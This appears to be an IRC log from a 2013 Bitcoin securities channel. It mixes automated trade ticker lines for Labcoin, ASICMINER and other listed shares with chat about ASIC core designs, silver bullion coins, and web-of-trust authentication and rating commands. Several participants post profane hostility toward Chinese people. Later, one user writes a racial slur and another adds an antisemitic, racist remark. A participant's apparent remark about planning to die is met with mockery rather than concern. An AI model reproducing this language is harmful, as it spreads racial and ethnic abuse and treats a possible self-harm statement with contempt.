[+] Aug 19 23:51:03 [BTCTC] [LABCOIN] 15000 @ 0.00249 = 37.35 BTC [+] Aug 19 23:51:04 [BTCTC] [LABCOIN] 1844 @ 0.002494 = 4.5989 BTC [+] Aug 19 23:51:05 [BTCTC] [LABCOIN] 2200 @ 0.002494 = 5.4868 BTC [+] Aug 19 23:51:07 [BTCTC] [LABCOIN] 500 @ 0.002494 = 1.247 BTC [+] Aug 19 23:51:08 [BTCTC] [LABCOIN] 10000 @ 0.002494 = 24.94 BTC [+] Aug 19 23:51:56 wtf Aug 19 23:52:05 GO LABCOIN Aug 19 23:52:19 fuck off Aug 19 23:52:32 profit taking soon Aug 19 23:52:34 :D Aug 19 23:52:37 fuck this sjit Aug 19 23:52:44 fuck it Aug 19 23:52:51 OMG WOW LABCOIN Aug 19 23:52:59 gecko_x8, I dont remember seeing you sober, ever. Aug 19 23:53:06 [BTCTC] [LABCOIN] 10 @ 0.00248 = 0.0248 BTC [-] Aug 19 23:53:13 oh i don't care Aug 19 23:53:17 there's what, 10 million outstanding shares? Aug 19 23:53:28 look jc Aug 19 23:53:34 going back to .002 no problem Aug 19 23:53:38 my money is on flat cores Aug 19 23:53:44 BUY, SELL. SELL, BUY Aug 19 23:53:47 [BTCTC] [ASICMINER-PT] 4 @ 3.66 = 14.64 BTC [+] Aug 19 23:53:54 the real question here Aug 19 23:54:00 [BTCTC] [BITVPS] 1 @ 0.002286 BTC [-] Aug 19 23:54:02 [BTCTC] [BITVPS] 10 @ 0.002255 = 0.0226 BTC [-] Aug 19 23:54:03 [BTCTC] [BITVPS] 220 @ 0.002221 = 0.4886 BTC [-] Aug 19 23:54:04 [BTCTC] [LABCOIN] 10 @ 0.00248 = 0.0248 BTC [-] Aug 19 23:54:04 is flat cores vs. rolled cores Aug 19 23:54:17 that's what u fuckers need to realize Aug 19 23:54:20 and fast Aug 19 23:54:28 now Aug 19 23:54:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.03658 BTC [-] Aug 19 23:54:42 [BTCTC] [TAT.ASICMINER] 11 @ 0.03658 = 0.4024 BTC [-] Aug 19 23:54:43 actm has a deal on flat cores with eAsic Aug 19 23:55:07 labcoin has a deal on rolled cores Aug 19 23:55:28 the winner will be the flat core fucker Aug 19 23:55:41 because flat core = one hash per cycle Aug 19 23:55:42 [BTCTC] [LABCOIN] 10 @ 0.00248 = 0.0248 BTC [-] Aug 19 23:55:43 [BTCTC] [LABCOIN] 40 @ 0.002499 = 0.1 BTC [+] Aug 19 23:55:45 [BTCTC] [LABCOIN] 400 @ 0.002499 = 0.9996 BTC [+] Aug 19 23:55:52 OMG LABCOIN Aug 19 23:55:54 u dig? Aug 19 23:56:14 taking that under advisement, gecko Aug 19 23:56:18 if u no dig, then fuck off Aug 19 23:56:24 haha Aug 19 23:56:31 k. Aug 19 23:56:33 [BTCTC] [LABCOIN] 700 @ 0.002499 = 1.7493 BTC [+] Aug 19 23:57:04 rolled up cores smoke better. Aug 19 23:57:21 yeah i like my cores rolled before i smoke them Aug 19 23:57:25 look mp, i'm a heavy smoker Aug 19 23:57:34 so i know all that shit Aug 19 23:57:39 quantum cores gonna win Aug 19 23:57:46 [BTCTC] [LABCOIN] 10 @ 0.002495 = 0.025 BTC [-] Aug 19 23:57:48 [BTCTC] [LABCOIN] 6905 @ 0.0025 = 17.2625 BTC [+] Aug 19 23:57:48 but u can't make a small dog bark Aug 19 23:57:56 like a big dog Aug 19 23:57:57 [BTCTC] [LABCOIN] 100 @ 0.0025 = 0.25 BTC [+] Aug 19 23:57:58 [BTCTC] [LABCOIN] 5000 @ 0.002507 = 12.535 BTC [+] Aug 19 23:57:59 [BTCTC] [LABCOIN] 100 @ 0.00252 = 0.252 BTC [+] Aug 19 23:58:00 [BTCTC] [LABCOIN] 7885 @ 0.002525 = 19.9096 BTC [+] Aug 19 23:58:17 gecko gonna explode if it hits 26 :P Aug 19 23:58:23 [BTCTC] [LABCOIN] 3351 @ 0.002525 = 8.4613 BTC [+] Aug 19 23:58:23 wow am I reading this correctly? Aug 19 23:58:26 26 incoming! Aug 19 23:58:29 0.02525 :O Aug 19 23:58:32 :) Aug 19 23:58:35 GET OUT YOUR UMBRELLAS IMMA MAKE IT RAIN Aug 19 23:58:38 err add a 0 Aug 19 23:58:49 sell sell sell Aug 19 23:59:06 what prompted this spike? lol Aug 19 23:59:07 [BTCTC] [LABCOIN] 25 @ 0.0025 = 0.0625 BTC [-] Aug 19 23:59:22 [BTCTC] [LABCOIN] 500 @ 0.00253 = 1.265 BTC [+] Aug 19 23:59:29 news that they're rolling out 6th in a few weeks Aug 19 23:59:43 nice Aug 19 23:59:46 [BTCTC] [LABCOIN] 30 @ 0.002499 = 0.075 BTC [-] Aug 19 23:59:58 fuck it Aug 20 00:00:01 The div calculations probably made some people's pants tight. Aug 20 00:00:10 no way labcoin will beat actm Aug 20 00:00:11 lol Aug 20 00:00:14 no fucking way Aug 20 00:00:27 hrmm hows AM doing? Aug 20 00:00:27 they are based in CHINA FOR FUCK'S SAKE Aug 20 00:00:30 [BTCTC] [LABCOIN] 10 @ 0.002485 = 0.0249 BTC [-] Aug 20 00:00:32 beat them how gecko? Aug 20 00:00:37 [BTCTC] [LABCOIN] 100 @ 0.00253 = 0.253 BTC [+] Aug 20 00:01:03 good luck sending your money to china assholes Aug 20 00:01:21 NUMBER ONE TRUST ASIC IN CHINA Aug 20 00:01:23 [BTCTC] [LABCOIN] 2 @ 0.0025 = 0.005 BTC [-] Aug 20 00:01:30 [BTCTC] [LABCOIN] 43 @ 0.0025 = 0.1075 BTC [-] Aug 20 00:01:35 let me remind you that the chinese ppl do not give a flying fuck about your personal health Aug 20 00:01:35 lol Aug 20 00:02:05 we are western agents Aug 20 00:02:16 we act like western fucking agents Aug 20 00:02:30 we do not sell out to eastern scam artists Aug 20 00:02:41 i mean what the fuck Aug 20 00:03:22 [BTCTC] [LABCOIN] 2 @ 0.0025 = 0.005 BTC [-] Aug 20 00:04:54 shocking Aug 20 00:05:15 if you don't sell stuff to eastern doods i have no idea how you imagien you'll pay for like... everything. Aug 20 00:05:28 who in the west still makes anything useful today ? all you got is selling out Aug 20 00:05:35 [BTCTC] [LABCOIN] 800 @ 0.0025 = 2 BTC [-] Aug 20 00:05:43 mircea_popescu you are absolutely correct sir Aug 20 00:05:49 absolutely Aug 20 00:06:04 i plan to sell my seminumismatic silver coins to them Aug 20 00:06:14 to whom? Aug 20 00:06:27 "eastern doods" Aug 20 00:06:43 for a massive premium Aug 20 00:06:55 how do i get in on that action? Aug 20 00:07:09 but that's npt the point here and now Aug 20 00:07:45 [BTCTC] [TAT.ASICMINER] 6 @ 0.03614 = 0.2168 BTC [-] Aug 20 00:08:07 [BTCTC] [LABCOIN] 600 @ 0.0025 = 1.5 BTC [-] Aug 20 00:08:18 the20year well.. through me, well not me but through knowledge of modern seminumismatic bullion silver coinage Aug 20 00:08:33 which i know a great deal about. Aug 20 00:08:37 [BTCTC] [TAT.ASICMINER] 46 @ 0.03658 = 1.6827 BTC [+] Aug 20 00:08:47 and i have the sources you need to learn more Aug 20 00:08:57 everything useful is made in teh west Aug 20 00:08:59 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [-] Aug 20 00:09:03 the east just replicate it for us Aug 20 00:09:15 negative. Aug 20 00:09:38 dub like asics rite ? Aug 20 00:10:07 yeah Aug 20 00:11:26 [HAVELOCK] [HIM] 1 @ 0.191 BTC [-] Aug 20 00:12:27 ;;seen usagi Aug 20 00:12:28 usagi was last seen in #bitcoin-assets 1 week, 1 day, 3 hours, 13 minutes, and 36 seconds ago: I'm here to torment dub. he around? Aug 20 00:13:14 ^ your seminumisnatic silver expert Aug 20 00:14:07 usagi changed its name to smidge Aug 20 00:14:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.03614 = 0.1807 BTC [-] Aug 20 00:14:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.03614 BTC [-] Aug 20 00:15:34 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [-] Aug 20 00:16:20 lol Aug 20 00:16:22 [MPEX] [S.MPOE] 3750 @ 0.00083956 = 3.1484 BTC [-] Aug 20 00:16:24 [MPEX] [S.MPOE] 8500 @ 0.00083944 = 7.1352 BTC [-] Aug 20 00:16:40 H'mm Aug 20 00:17:28 My IRC commands are very bad, spoiled by windows :( Aug 20 00:18:45 numismatic semiexpert lol Aug 20 00:20:55 [BTCTC] [ACTIVEMINING] 68 @ 0.005331 = 0.3625 BTC [+] Aug 20 00:20:56 http://www.cnbc.com/id/100971898 - "I think it is interesting that Germany has gone ahead and given legal status to the bitcoin, as it could become an alternative to the euro if the single currency ever ceased to exist," Brooks said. "If the euro does go belly up the German authorities could potentially still collect tax if everyone started using the bitcoin - that's a good example of Aug 20 00:20:56 [BTCTC] [ACTIVEMINING] 15 @ 0.005332 = 0.08 BTC [+] Aug 20 00:20:56 German forward-thinking!" lol Aug 20 00:21:02 Bitcoin recognized by Germany as legal tender Aug 20 00:22:51 jurov that's correct Aug 20 00:24:01 i have enough of this german nonsense... should perhaps arm myself with langenscheidt and hunt down the original source Aug 20 00:24:07 [HAVELOCK] [LABCO] 24 @ 0.00219 = 0.0526 BTC [-] Aug 20 00:24:11 [HAVELOCK] [LABCO] 332 @ 0.0022 = 0.7304 BTC [+] Aug 20 00:24:25 forget germany what about labcoin Aug 20 00:24:30 [HAVELOCK] [LABCO] 5 @ 0.00234599 = 0.0117 BTC [+] Aug 20 00:24:43 :\ Aug 20 00:25:00 jurov be cool Aug 20 00:25:01 i am not touching pmbs with long dry stick Aug 20 00:25:11 cool it Aug 20 00:25:15 [BTCTC] [LABCOIN] 10 @ 0.002485 = 0.0249 BTC [-] Aug 20 00:25:23 [BTCTC] [LABCOIN] 1 @ 0.002405 BTC [-] Aug 20 00:25:24 [BTCTC] [HOSTED-MINING] 15 @ 0.272 = 4.08 BTC [-] Aug 20 00:25:25 what is LABCO? lol Aug 20 00:25:25 [BTCTC] [LABCOIN] 10 @ 0.002404 = 0.024 BTC [-] Aug 20 00:25:26 [BTCTC] [LABCOIN] 8 @ 0.002403 = 0.0192 BTC [-] Aug 20 00:25:27 [BTCTC] [LABCOIN] 20 @ 0.002402 = 0.048 BTC [-] Aug 20 00:25:28 [BTCTC] [LABCOIN] 50 @ 0.002402 = 0.1201 BTC [-] Aug 20 00:25:29 [BTCTC] [LABCOIN] 207 @ 0.002401 = 0.497 BTC [-] Aug 20 00:25:30 [BTCTC] [LABCOIN] 150 @ 0.002401 = 0.3602 BTC [-] Aug 20 00:25:31 ohh on havelock Aug 20 00:25:32 [BTCTC] [LABCOIN] 1544 @ 0.0024 = 3.7056 BTC [-] Aug 20 00:25:37 ysternaud, only the hottest stock on the planet Aug 20 00:26:17 as long as it goes over 0.0023 im happy Aug 20 00:26:44 jurov i already miss you, you had any question about silver bullion coins? Aug 20 00:26:48 [HAVELOCK] [AM100] 2 @ 0.037 = 0.074 BTC [-] Aug 20 00:26:50 [HAVELOCK] [AM100] 5 @ 0.03709 = 0.1855 BTC [+] Aug 20 00:26:52 don't be scared Aug 20 00:26:57 [HAVELOCK] [AM100] 5 @ 0.03709 = 0.1855 BTC [+] Aug 20 00:26:58 just ask me Aug 20 00:27:09 why do you miss me? Aug 20 00:27:26 because you recognized the field Aug 20 00:27:55 now Aug 20 00:28:07 silver bullion is my trade Aug 20 00:28:23 and i do it the best i can Aug 20 00:28:29 reptila? Aug 20 00:28:35 i just looked around for our resident silver semiexpert, he's too funny Aug 20 00:28:37 been doing it for years Aug 20 00:29:05 well he's not me Aug 20 00:29:12 and i'm not him Aug 20 00:29:13 sadly, reptilia doesn't frequent irc Aug 20 00:29:19 only usagi does Aug 20 00:29:27 i am the lizard Aug 20 00:29:32 motherfuck Aug 20 00:29:47 i say what's what Aug 20 00:30:07 ok? Aug 20 00:30:10 u ask me Aug 20 00:30:18 and u get the knowledge Aug 20 00:30:30 u understand? Aug 20 00:31:10 now Aug 20 00:31:19 what do you think about these? Aug 20 00:31:20 looking at silver bullion Aug 20 00:31:22 http://www.mint.sk/nakup_671.php?lang=en Aug 20 00:31:50 mmnt this is not bullion Aug 20 00:31:59 i think they are all for collecting purpouses Aug 20 00:32:17 they have nothing to do with investing in bullion Aug 20 00:32:37 if you are a numiosmatic expert, then i know nothing about them Aug 20 00:32:44 [BTCTC] [LABCOIN] 30 @ 0.002431 = 0.0729 BTC [+] Aug 20 00:32:46 [BTCTC] [LABCOIN] 85 @ 0.00243 = 0.2066 BTC [-] Aug 20 00:32:46 [BTCTC] [LABCOIN] 20 @ 0.002428 = 0.0486 BTC [-] Aug 20 00:32:47 [BTCTC] [LABCOIN] 1 @ 0.002413 BTC [-] Aug 20 00:32:48 [BTCTC] [LABCOIN] 178 @ 0.002411 = 0.4292 BTC [-] Aug 20 00:32:50 [BTCTC] [LABCOIN] 186 @ 0.00241 = 0.4483 BTC [-] Aug 20 00:33:05 but if you are looking to invest in silver, i say those are the last coins you should be looking at Aug 20 00:34:08 when u invest in silver, there are 2 ways u can go Aug 20 00:34:27 bullion, and seminumismatic. Aug 20 00:34:35 both are good Aug 20 00:34:48 when it comes to seminumi, i'm ur guy Aug 20 00:34:55 the rest, i don't give a fuck Aug 20 00:35:06 [BTCTC] [ACTIVEMINING] 6 @ 0.005433 = 0.0326 BTC [+] Aug 20 00:35:07 [BTCTC] [ACTIVEMINING] 68 @ 0.005434 = 0.3695 BTC [+] Aug 20 00:35:08 [BTCTC] [ACTIVEMINING] 231 @ 0.005436 = 1.2557 BTC [+] Aug 20 00:35:09 [BTCTC] [ACTIVEMINING] 195 @ 0.005439 = 1.0606 BTC [+] Aug 20 00:35:44 jurov iirc he got locked up w/o interwebs access. or so the story went. Aug 20 00:36:32 jurov Aug 20 00:36:33 yes, but that was long time ago, he prolly recovered Aug 20 00:36:50 oh, and what is your burn rate atm? Aug 20 00:36:54 do you know what 2008 perth mint koala's are trading for surrently? Aug 20 00:37:08 currently* Aug 20 00:37:13 my burn rate is about 500 million a day. Aug 20 00:37:24 mp stfu willya Aug 20 00:37:32 we are having a convo here Aug 20 00:37:39 plz Aug 20 00:38:31 gecko, i'm interested in your burn rate. and i don't know about these perth mints Aug 20 00:38:45 my burn rate is 0 Aug 20 00:38:53 [BTCTC] [BASIC-MINING] 4 @ 0.2875 = 1.15 BTC [+] Aug 20 00:38:58 [HAVELOCK] [AM100] 10 @ 0.0371 = 0.371 BTC [+] Aug 20 00:39:15 and you need to know about the perth's Aug 20 00:39:25 it's very important Aug 20 00:39:30 why 0? gave up everything incl.food? Aug 20 00:39:37 yes Aug 20 00:39:50 not planning to live Aug 20 00:39:56 planning to die Aug 20 00:39:59 hm. seems you did not recover, then Aug 20 00:40:02 but before that, u ask Aug 20 00:40:04 i answer Aug 20 00:40:08 get it? Aug 20 00:40:20 now Aug 20 00:40:44 [BTCTC] [ASICMINER-PT] 1 @ 3.646 BTC [-] Aug 20 00:40:53 ;;rated lomus Aug 20 00:40:54 You have not yet rated user lomus Aug 20 00:40:54 well.. do explain what is so special about these mints Aug 20 00:41:13 [BTCTC] [ASICMINER-PT] 2 @ 3.647 = 7.294 BTC [+] Aug 20 00:41:23 jurov i will not, i will only refer you Aug 20 00:41:39 [BTCTC] [LABCOIN] 30 @ 0.002471 = 0.0741 BTC [+] Aug 20 00:41:40 [BTCTC] [LABCOIN] 22 @ 0.002472 = 0.0544 BTC [+] Aug 20 00:41:52 [BTCTC] [ASICMINER-PT] 1 @ 3.649 BTC [+] Aug 20 00:41:53 [BTCTC] [ASICMINER-PT] 1 @ 3.65 BTC [+] Aug 20 00:41:58 so that you might be able to begin your journey Aug 20 00:42:07 ok? Aug 20 00:42:17 [BTCTC] [LABCOIN] 30 @ 0.002437 = 0.0731 BTC [-] Aug 20 00:42:18 [BTCTC] [LABCOIN] 58 @ 0.002436 = 0.1413 BTC [-] Aug 20 00:42:53 oh. sorry, not interested. maybe if you had some morphite bullion. Aug 20 00:43:29 ;;ident Aug 20 00:43:31 You are not identified. Aug 20 00:43:39 damn Aug 20 00:43:52 ok, n/m Aug 20 00:43:54 then Aug 20 00:44:03 i had an url just ready to paste Aug 20 00:44:16 but obviously you are not interested. Aug 20 00:45:19 well, i'm not in mood. gonna rather retreat to my designated secure area. Aug 20 00:45:32 well Aug 20 00:45:44 jurov sauna ? Aug 20 00:45:57 my link would be a 15 min youtube vid that is calm and accurate Aug 20 00:46:19 no need for fuzz Aug 20 00:46:36 mircea_popescu: no, bed. Aug 20 00:46:56 nite jurov Aug 20 00:47:01 [BTCTC] [ACTIVEMINING] 10 @ 0.00524 = 0.0524 BTC [-] Aug 20 00:47:07 nite Aug 20 00:47:11 gonna watch the vid myself Aug 20 00:47:23 just to remind me of the situation at hand Aug 20 00:48:01 .d Aug 20 00:48:02 50810339.04828 | Next Diff in 932 blocks | Estimated Change: 22.3764% in 5d 0h 33m 30s Aug 20 00:48:23 ;;bcregister Lomus 1EpEbiRBiXkP7nbA4XW3FuN99iNxG8tzo1 Aug 20 00:48:23 Request successful for user Lomus, hostmask Lomus!561e2a0b@gateway/web/freenode/ip.86.30.42.11. Your challenge string is: freenode:#bitcoin-otc:de8682a3baf5213ff718a16ad0c65f8e2dcb2b4f65aa56db29da2586 Aug 20 00:49:30 [BTCTC] [HOSTED-MINING] 1 @ 0.2799 BTC [+] Aug 20 00:49:39 [BTCTC] [ASICMINER-PT] 2 @ 3.65 = 7.3 BTC [+] Aug 20 00:50:09 [BTCTC] [BASIC-MINING] 1 @ 0.2878 BTC [+] Aug 20 00:50:10 [BTCTC] [BASIC-MINING] 3 @ 0.2879 = 0.8637 BTC [+] Aug 20 00:50:10 ;;bcverify freenode:#bitcoin-otc:de8682a3baf5213ff718a16ad0c65f8e2dcb2b4f65aa56db29da2586 Aug 20 00:50:11 Error: Authentication failed. Please try again. Aug 20 00:50:11 [BTCTC] [BASIC-MINING] 1 @ 0.289 BTC [+] Aug 20 00:50:12 [BTCTC] [BASIC-MINING] 5 @ 0.2899 = 1.4495 BTC [+] Aug 20 00:50:37 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [+] Aug 20 00:53:17 ;;bcverify IMsmwwB1RagBM+Cjhzx3ItXeEzHFCesAcOPn3/lhCHb+BBRYtu8h6ONyqz4uiQ3ItIInF4OKrMUNFpZXpLixFyE= Aug 20 00:53:18 Registration successful. You are now authenticated for user 'Lomus' with address 1EpEbiRBiXkP7nbA4XW3FuN99iNxG8tzo1 Aug 20 00:53:33 ;;eauth mircea_popescu Aug 20 00:53:34 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Aug 20 00:53:58 [HAVELOCK] [CFIG] 36 @ 0.15 = 5.4 BTC Aug 20 00:54:11 ;;rated Aug 20 00:54:12 (rated ) -- Get the details about the rating you gave to , if any. Aug 20 00:54:21 ;;everify freenode:#bitcoin-otc:5dc59330ff2cf22950c230f80360f30c71d114efcf2dcfdebf8b0027 Aug 20 00:54:22 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Aug 20 00:54:29 ;;rate lomus 1 Trader. Aug 20 00:54:30 Rating entry successful. Your rating of 1 for user lomus has been recorded. Aug 20 00:54:37 [BTCTC] [LABCOIN] 20 @ 0.002441 = 0.0488 BTC [+] Aug 20 00:54:39 [BTCTC] [LABCOIN] 100 @ 0.00244 = 0.244 BTC [-] Aug 20 00:54:40 [BTCTC] [LABCOIN] 22 @ 0.00243 = 0.0535 BTC [-] Aug 20 00:54:40 [BTCTC] [LABCOIN] 2858 @ 0.00242 = 6.9164 BTC [-] Aug 20 00:55:09 ;;rate mircea_popescu 1 Trader Aug 20 00:55:11 Rating entry successful. Your rating of 1 for user mircea_popescu has been recorded. Aug 20 00:57:33 [BTCTC] [LABCOIN] 30 @ 0.002421 = 0.0726 BTC [+] Aug 20 00:57:34 [BTCTC] [LABCOIN] 1970 @ 0.00242 = 4.7674 BTC [-] Aug 20 00:58:09 one day you're here baby, and then you're gooone Aug 20 01:02:44 mr. jurov Aug 20 01:02:48 [BTCTC] [LABCOIN] 20 @ 0.002422 = 0.0484 BTC [+] Aug 20 01:02:50 [BTCTC] [LABCOIN] 172 @ 0.00242 = 0.4162 BTC [-] Aug 20 01:03:18 [BTCTC] [DMS.PURCHASE] 1 @ 0.02066 BTC [-] Aug 20 01:03:32 [BTCTC] [LABCOIN] 30 @ 0.002366 = 0.071 BTC [-] Aug 20 01:03:33 [BTCTC] [LABCOIN] 19 @ 0.002365 = 0.0449 BTC [-] Aug 20 01:03:41 ahh i just notice now i span two years of wot ratings. Aug 20 01:03:53 u wot m8 Aug 20 01:03:58 dude what years they've been Aug 20 01:04:10 [HAVELOCK] [AM100] 3 @ 0.0371 = 0.1113 BTC [+] Aug 20 01:04:14 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [+] Aug 20 01:04:20 preety intense :) Aug 20 01:04:27 pretty Aug 20 01:04:45 indeed. Aug 20 01:04:47 well, mazel tov. Aug 20 01:04:48 shits been so cash Aug 20 01:05:01 [BTCTC] [NASTY-PT] 2 @ 0.003699 = 0.0074 BTC [+] Aug 20 01:05:26 [BTCTC] [LABCOIN] 30 @ 0.00243 = 0.0729 BTC [+] Aug 20 01:05:27 [BTCTC] [LABCOIN] 85 @ 0.002431 = 0.2066 BTC [+] Aug 20 01:05:27 [BTCTC] [LABCOIN] 16 @ 0.002433 = 0.0389 BTC [+] Aug 20 01:05:28 [BTCTC] [LABCOIN] 20 @ 0.002435 = 0.0487 BTC [+] Aug 20 01:05:30 [BTCTC] [LABCOIN] 83 @ 0.002439 = 0.2024 BTC [+] Aug 20 01:05:31 [BTCTC] [LABCOIN] 101 @ 0.00244 = 0.2464 BTC [+] Aug 20 01:06:06 i dun understand that nigger talk Aug 20 01:06:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.0362 = 0.181 BTC [+] Aug 20 01:06:21 jooz aren't niggers, they're just tanned. Aug 20 01:06:49 [BTCTC] [LABCOIN] 30 @ 0.002397 = 0.0719 BTC [-] Aug 20 01:06:50 [BTCTC] [LABCOIN] 64 @ 0.002398 = 0.1535 BTC [+] Aug 20 01:06:52 [BTCTC] [LABCOIN] 1000 @ 0.0024 = 2.4 BTC [+] Aug 20 01:07:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.03612 = 0.0722 BTC [-] Aug 20 01:07:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.03612 = 0.0722 BTC [-] Aug 20 01:07:07 thestringpuller: ä? Aug 20 01:07:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.03612 = 0.0722 BTC [-] Aug 20 01:07:29 [HAVELOCK] [VTX] 5 @ 0.619 = 3.095 BTC [+] Aug 20 01:07:31 [HAVELOCK] [VTX] 3 @ 0.61999 = 1.86 BTC [+] Aug 20 01:07:50 [BTCTC] [LABCOIN] 30 @ 0.002403 = 0.0721 BTC [+] Aug 20 01:07:52 [BTCTC] [LABCOIN] 85 @ 0.002402 = 0.2042 BTC [-] Aug 20 01:07:53 [BTCTC] [LABCOIN] 176 @ 0.0024 = 0.4224 BTC [-] Aug 20 01:07:54 [BTCTC] [LABCOIN] 20 @ 0.002366 = 0.0473 BTC [-] Aug 20 01:07:55 [BTCTC] [LABCOIN] 118 @ 0.002362 = 0.2787 BTC [-] Aug 20 01:07:57 [BTCTC] [LABCOIN] 71 @ 0.002359 = 0.1675 BTC [-] Aug 20 01:08:41 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00149 = 0.0045 BTC [+] Aug 20 01:10:21 [BTCTC] [LABCOIN] 30 @ 0.002374 = 0.0712 BTC [+] Aug 20 01:10:22 [BTCTC] [LABCOIN] 30 @ 0.002373 = 0.0712 BTC [-] Aug 20 01:10:24 [BTCTC] [LABCOIN] 20 @ 0.002369 = 0.0474 BTC [-] Aug 20 01:10:24 [BTCTC] [LABCOIN] 12 @ 0.002341 = 0.0281 BTC [-] Aug 20 01:10:25 [BTCTC] [LABCOIN] 100 @ 0.00234 = 0.234 BTC [-] Aug 20 01:10:27 [BTCTC] [LABCOIN] 3 @ 0.00234 = 0.007 BTC [-] Aug 20 01:10:56 [BTCTC] [LABCOIN] 30 @ 0.002376 = 0.0713 BTC [+] Aug 20 01:10:57 [BTCTC] [LABCOIN] 27 @ 0.002375 = 0.0641 BTC [-] Aug 20 01:11:59 [HAVELOCK] [AM1] 1 @ 3.7251 BTC [-] Aug 20 01:12:03 [HAVELOCK] [AM1] 1 @ 3.725 BTC [-] Aug 20 01:12:06 [HAVELOCK] [AM1] 1 @ 3.72000001 BTC [-] Aug 20 01:13:21 [HAVELOCK] [AM1] 1 @ 3.72 BTC [-] Aug 20 01:13:43 [BTCTC] [LABCOIN] 30 @ 0.002341 = 0.0702 BTC [-] Aug 20 01:13:45 [BTCTC] [LABCOIN] 111 @ 0.00234 = 0.2597 BTC [-] Aug 20 01:14:29 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [+] Aug 20 01:17:01 [BTCTC] [LABCOIN] 889 @ 0.00234 = 2.0803 BTC [-] Aug 20 01:17:02 [BTCTC] [LABCOIN] 125 @ 0.002291 = 0.2864 BTC [-] Aug 20 01:17:04 [BTCTC] [LABCOIN] 1000 @ 0.00229 = 2.29 BTC [-] Aug 20 01:17:05 [BTCTC] [LABCOIN] 665 @ 0.002284 = 1.5189 BTC [-] Aug 20 01:17:07 [BTCTC] [LABCOIN] 2395 @ 0.002283 = 5.4678 BTC [-] Aug 20 01:18:02 [BTCTC] [ACTIVEMINING] 4 @ 0.00524 = 0.021 BTC [-] Aug 20 01:19:51 [BTCTC] [BASIC-MINING] 2 @ 0.2899 = 0.5798 BTC [+] Aug 20 01:21:22 ;;tslb Aug 20 01:21:26 Time since last block: 3 minutes and 5 seconds Aug 20 01:21:29 [HAVELOCK] [CFIG] 146 @ 0.15 = 21.9 BTC Aug 20 01:22:13 [BTCTC] [LABCOIN] 45 @ 0.00236 = 0.1062 BTC [+] Aug 20 01:23:36 [BTCTC] [DMS.MINING] 13 @ 0.00331 = 0.043 BTC [+] Aug 20 01:23:56 [MPEX] [S.MPOE] 9350 @ 0.00083993 = 7.8533 BTC [+] Aug 20 01:23:57 Opa! Aug 20 01:23:58 [MPEX] [S.MPOE] 1443 @ 0.00084 = 1.2121 BTC [+] Aug 20 01:24:02 [MPEX] [S.MPOE] 3249 @ 0.00084163 = 2.7345 BTC [+] Aug 20 01:24:03 [MPEX] [S.MPOE] 15583 @ 0.00084163 = 13.1151 BTC [+] Aug 20 01:24:45 [BTCTC] [DMS.MINING] 5 @ 0.00332 = 0.0166 BTC [+] Aug 20 01:25:34 [BTCTC] [LABCOIN] 15 @ 0.002284 = 0.0343 BTC [-] Aug 20 01:25:35 [BTCTC] [LABCOIN] 320 @ 0.002282 = 0.7302 BTC [-] Aug 20 01:25:36 buttcoin http://www.explosm.net/comics/3220/ Aug 20 01:25:37 [BTCTC] [LABCOIN] 6 @ 0.002273 = 0.0136 BTC [-] Aug 20 01:25:38 [BTCTC] [LABCOIN] 625 @ 0.002242 = 1.4013 BTC [-] Aug 20 01:25:39 [BTCTC] [LABCOIN] 5000 @ 0.002241 = 11.205 BTC [-] Aug 20 01:25:40 [BTCTC] [LABCOIN] 238 @ 0.002223 = 0.5291 BTC [-] Aug 20 01:25:41 [BTCTC] [LABCOIN] 145 @ 0.002221 = 0.322 BTC [-] Aug 20 01:25:41 Theres black people in Somalia I'm sure, but Romania too? Aug 20 01:25:42 [BTCTC] [LABCOIN] 163 @ 0.00222 = 0.3619 BTC [-] Aug 20 01:25:43 [BTCTC] [LABCOIN] 1000 @ 0.00222 = 2.22 BTC [-] Aug 20 01:25:43 [BTCTC] [LABCOIN] 125 @ 0.002215 = 0.2769 BTC [-] Aug 20 01:25:44 [BTCTC] [LABCOIN] 1000 @ 0.002214 = 2.214 BTC [-] Aug 20 01:25:45 [BTCTC] [LABCOIN] 1926 @ 0.002202 = 4.2411 BTC [-] Aug 20 01:25:46 [BTCTC] [LABCOIN] 722 @ 0.002201 = 1.5891 BTC [-] Aug 20 01:25:47 [BTCTC] [LABCOIN] 276 @ 0.0022 = 0.6072 BTC [-] Aug 20 01:25:48 [BTCTC] [LABCOIN] 1500 @ 0.0022 = 3.3 BTC [-] Aug 20 01:25:49 [BTCTC] [LABCOIN] 4000 @ 0.0022 = 8.8 BTC [-] Aug 20 01:25:51 [BTCTC] [DMS.PURCHASE] 4 @ 0.02066 = 0.0826 BTC [-] Aug 20 01:26:12 [BTCTC] [ASICMINER-PT] 1 @ 3.627 BTC [-] Aug 20 01:26:13 [BTCTC] [ASICMINER-PT] 1 @ 3.626 BTC [-] Aug 20 01:26:14 [BTCTC] [ASICMINER-PT] 1 @ 3.625 BTC [-] Aug 20 01:26:15 [BTCTC] [ASICMINER-PT] 1 @ 3.601 BTC [-] Aug 20 01:26:21 [BTCTC] [LABCOIN] 6 @ 0.002192 = 0.0132 BTC [-] Aug 20 01:26:22 [BTCTC] [LABCOIN] 50 @ 0.002191 = 0.1096 BTC [-] Aug 20 01:26:24 [BTCTC] [LABCOIN] 62 @ 0.002161 = 0.134 BTC [-] Aug 20 01:26:25 [BTCTC] [LABCOIN] 500 @ 0.00216 = 1.08 BTC [-] Aug 20 01:26:26 [BTCTC] [LABCOIN] 75 @ 0.002151 = 0.1613 BTC [-] Aug 20 01:26:27 [BTCTC] [LABCOIN] 600 @ 0.00215 = 1.29 BTC [-] Aug 20 01:26:28 [BTCTC] [LABCOIN] 375 @ 0.002112 = 0.792 BTC [-] Aug 20 01:26:30 [BTCTC] [LABCOIN] 1000 @ 0.002111 = 